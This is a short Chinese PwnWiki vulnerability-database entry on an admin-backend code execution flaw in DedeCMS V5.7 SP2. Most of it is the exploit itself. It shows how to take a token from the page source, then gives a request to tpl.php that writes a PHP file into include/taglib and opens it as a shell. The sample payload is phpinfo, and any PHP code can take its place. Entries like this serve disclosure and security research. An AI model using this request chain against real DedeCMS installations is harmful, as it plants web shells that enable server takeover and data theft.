Loading
0

DedeCMS V5.7 SP2 后台代码执行漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞利用

首先获取token: domain + /dede/tpl.php?action=upload

通过查看页面源码即可获得 token 

http://127.0.0.1/uploads/dede/tpl.php?action=upload

Token.png

然后访问: 

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>

Shell

http://127.0.0.1/include/taglib/secnote.lib.php

免费、自由、人人可编辑的漏洞库--PwnWiki.com